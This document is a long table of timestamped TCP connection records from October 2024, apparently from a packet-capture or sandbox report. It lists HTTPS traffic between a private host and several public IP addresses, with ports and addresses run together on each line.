                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.235414982 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.235413074 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.235450029 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.235487938 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.235512018 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.281193018 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.281352997 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.312066078 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.312205076 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.312499046 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.312577009 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.312613964 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.312673092 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.355416059 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.355499029 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.355568886 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.355591059 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.355618954 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.355638027 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.400969028 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.401056051 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.431705952 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.431955099 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.432043076 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.432116985 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.496802092 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.496824980 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.496865034 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.497045040 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.497045994 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.497067928 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.546349049 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552598953 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552619934 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552661896 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552704096 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552720070 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552737951 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552778959 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.552803040 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.640340090 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.640408993 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.640495062 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.640533924 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.640563011 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.640599012 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.716999054 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.717051983 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.717156887 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.717225075 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.717273951 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.717273951 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.791450024 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.791510105 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.791630983 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.791630983 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.791661024 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.791709900 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.836987972 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.837011099 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.837122917 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.837133884 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.837181091 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.911467075 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.911493063 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.911597967 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.911608934 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.911648989 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.957595110 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.957627058 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.957736969 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.957798004 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:36.957856894 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.031641006 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.031666040 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.031742096 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.031788111 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.031821966 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.031848907 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.119210005 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.119268894 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.119342089 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.119414091 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.119452000 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.119473934 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.151309013 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.151397943 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.151477098 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.151546001 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.151582003 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.151606083 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.239100933 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.239150047 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.239258051 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.239296913 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.239356041 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.239356041 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.271064043 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.271115065 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.271234035 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.271294117 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.271358967 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.271358967 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356800079 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356849909 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356915951 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356942892 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356971025 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356987953 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.356991053 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.357013941 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.357044935 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.357253075 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.357315063 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.358365059 CEST49901443192.168.2.16104.18.65.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.358383894 CEST44349901104.18.65.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.362024069 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.362036943 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.362123013 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.363049984 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.363064051 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.371527910 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.371551037 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.371618986 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.371829987 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.371855021 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.455631018 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.455660105 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.455713987 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.456046104 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.456058979 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.984956026 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.986589909 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.986654997 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.990225077 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.990314960 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.995790005 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.995882034 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.996049881 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:37.996081114 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.040431023 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.100024939 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.100397110 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.100406885 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.101843119 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.101964951 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.103038073 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.103111982 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.103194952 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.103199959 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143692970 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143748999 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143786907 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143807888 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143831015 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143878937 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143886089 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143901110 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.143953085 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.144051075 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.144115925 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.144150972 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.144187927 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.144201040 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.144257069 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.149239063 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.198168993 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.198935032 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.198947906 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.199651957 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.199975967 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.200067997 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.200149059 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.200189114 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.260412931 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.260502100 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.260535955 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.260555983 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.260566950 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.260605097 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261102915 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261157990 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261194944 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261219978 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261225939 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261261940 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261904001 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.261981964 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.262018919 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.262020111 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.262032032 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.262067080 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.262073040 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.263155937 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.263219118 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.263225079 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.268268108 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.268316984 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.268404961 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.268414974 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.268474102 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.269925117 CEST49916443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.269939899 CEST44349916104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.287466049 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.287513971 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.287591934 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.288052082 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.288070917 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.309231997 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.377913952 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.377985001 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378021002 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378055096 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378058910 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378074884 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378115892 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378345966 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378407001 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378422976 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378793955 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378833055 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378856897 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378870010 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378915071 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378928900 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.378942966 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.379056931 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.379688978 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.379755020 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.379812956 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.379825115 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.420399904 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.443260908 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.443339109 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.443425894 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.443628073 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.443656921 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.449435949 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.449521065 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.449590921 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.450196028 CEST49911443192.168.2.1663.140.62.222
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.450227976 CEST4434991163.140.62.222192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.452722073 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.452761889 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.452827930 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.453242064 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.453258038 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495090008 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495443106 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495454073 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495527983 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495546103 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495942116 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.495984077 CEST44349913104.18.66.57192.168.2.16
